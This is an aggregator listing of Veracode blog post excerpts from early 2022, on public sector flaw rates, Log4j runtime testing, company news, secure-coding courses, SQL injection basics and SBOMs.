2022-03-29 14:02:48 | The Public Sector Has the Highest Proportion of Security Flaws of Any Industry (lien direct) | We recently launched the 12th annual edition of our State of Software Security (SOSS) report. To draw conclusions for the report, we examined the entire history of active applications. For the public sector data, we took the same approach. We examined the entire history of applications for government agencies and educational institutions. We found that the public sector has the highest proportion of security flaws of any industry. On average, most industries have flaws in approximately 76 percent of their applications – but that number is 8 percent higher for the public sector at 82 percent. As you'll see in the figure above, the public sector also has a lower-than-average proportion of flaws actually fixed, and it takes significantly longer to remediate flaws. Let's dig a bit deeper into the remediation of open-source flaws. Remediating open-source flaws appears to take a while for every industry. In fact, for most industries, 30 percent of vulnerable libraries remain unresolved… | ★★ | ||
|
2022-03-22 17:35:44 | Shifting Log4j Discovery Right (lien direct) | You hear a lot about shifting your application security (AppSec) left – in other words, shifting AppSec to the beginning of the software development lifecycle (SDLC). While we firmly believe that you should continue scanning in development environments, that doesn't mean that you should neglect applications that have been deployed to or staged in runtime environments. Runtime presents a unique set of challenges – misconfigurations, logic errors and the like that can't be identified in a static or third-party scan. If you aren't testing for vulnerabilities at runtime, you are risking a potential breach of a different kind. As Chris Wysopal, our co-founder and CTO recently emphasized ... In a shift left world, shifting right is more important than ever. There are many examples that warrant shifting both left and right. Consider the recent zero-day vulnerability in Log4j 2.x reported on December 9, 2021. Log4j is a Java-based logging utility used by developers to keep track of what… | Vulnerability | ||
|
2022-03-15 09:58:36 | Veracode Announces Significant Growth Investment From TA Associates (lien direct) | I am pleased to share the exciting news that TA Associates (“TA”), a leading global growth equity firm, has signed an agreement to make a strategic growth investment in Veracode, taking a majority equity position in the business. Thoma Bravo will also continue to be an investor alongside TA. This new partnership is forming at a critical moment in the evolution of the software security market. Enterprises across all industry verticals need a platform and a partner that can help them secure the software that runs our world. We are excited to partner with TA and Thoma Bravo to do exactly that for our customers and deliver the best outcomes for both their development and security teams. Today's news represents another step on the journey that began even before Veracode was incorporated, when Weld Pond, our founder and CTO Chris Wysopal, and his colleagues at L0pht testified to the US Congress about the need to secure software. Since our founding, Veracode has consistently led the way to… | Guideline | ||
|
2022-03-02 18:29:20 | Veracode Achieves AWS Security Competency Status (lien direct) | We are proud to announce that we have recently achieved AWS Security Competency Partner status. This status exemplifies our technical expertise and dedication to helping customers secure their software at every stage of cloud adoption. “Veracode has been partnering with AWS for years. In fact, we also recently received our AWS DevOps Competency status for our demonstrated expertise in delivering DevOps solutions on the AWS Cloud. We trust the security and reliability of AWS and, now that we have achieved the AWS Security Competency status, we are proud to say that AWS trusts the security and reliability of Veracode. Together, we can help customers change the world with innovative cloud-based software,” said Dave Grazio, Senior Director of Partner Marketing at Veracode. As an AWS Security Competency Partner, we offer security-focused solutions to meet a wide variety of workloads and use cases. And since we're cloud-based, you can easily deploy our solutions in a matter of minutes.… | |||
|
2022-02-28 17:04:51 | New in Security Labs: Kotlin & Swift Mobile Courses (lien direct) | Secure coding with Kotlin & Swift This week we've added new Kotlin & Swift Courses to the Security Labs catalog! The update includes 4-5 Kotlin (Android) labs and 4 Swift (iOS) labs that cover common mobile security topics such as secret storage, authorization, and custom URL handling. Developers (and anyone curious about how to write secure code) can now try out hands-on exercises in real applications that help highlight coding mistakes that can lead to security vulnerabilities as well as steps to take to avoid and/or fix them. What is Kotlin? Kotlin is an open-source, statically typed programming language developed by JetBrains designed for JVM, Android, JavaScript, and Native. Kotlin combines object-oriented and functional constructs, focusing on interoperability, safety, clarity, and tooling support, and can be used for any kind of development, be it server-side, client-side web, or Android. It tends to be more concise, so if you're looking to cut down on the number… | Guideline | ||
|
2022-02-17 12:24:35 | SQL Injection in Today\'s Landscape (lien direct) | What is SQL injection? A SQL injection flaw allows for an attacker to modify or inject SQL syntax into the request to make the application behave in a manner that was not initially intended. In other words, an attacker can change a database query to: Read sensitive data Modify the database Execute other database functions Break authentication Lead to remote code execution Now with almost all web applications having integrations with databases in some way, this flaw has the potential to arise often. However, many frameworks and libraries are available to make database connections and queries safe. That said, SQL injection still exists and is very common. Injection flaws were the number one flaw category under the OWASP 2017, and, currently, injection flaws hold the number three spot in the OWASP 2021. SQL injection flaws have impacted every industry as well as enterprises that already have a mature information security program in place. It can happen, and it can be catastrophic! How… | Guideline | ||
|
2022-02-14 12:19:04 | (Déjà vu) What Is an SBOM and Why Do You Need One? (lien direct) | SBOM stands for Software Bill of Materials Before we jump into definitions, let's quickly level set on how we got here. Over the last few years, the way we build software has changed drastically. With the increasing need to move faster and release more frequently, organizations are opting to get rid of monolithic architectures and adopt a microservices architecture for greater agility, resiliency, and efficiency. Developers are now able to use more third-party resources and containers to piece together best-of-breed parts for their applications to run on. As a result, less of the code that makes up an application is owned and managed directly by that organization. Unfortunately, it's difficult to get full transparency into all these pieces since the decision-making process and documentation process can happen in numerous places across an organization. The lack of a concrete way to determine all the components of an application introduces substantial cybersecurity risks,… | ★★★ |
To see everything:
Our RSS (filtrered)
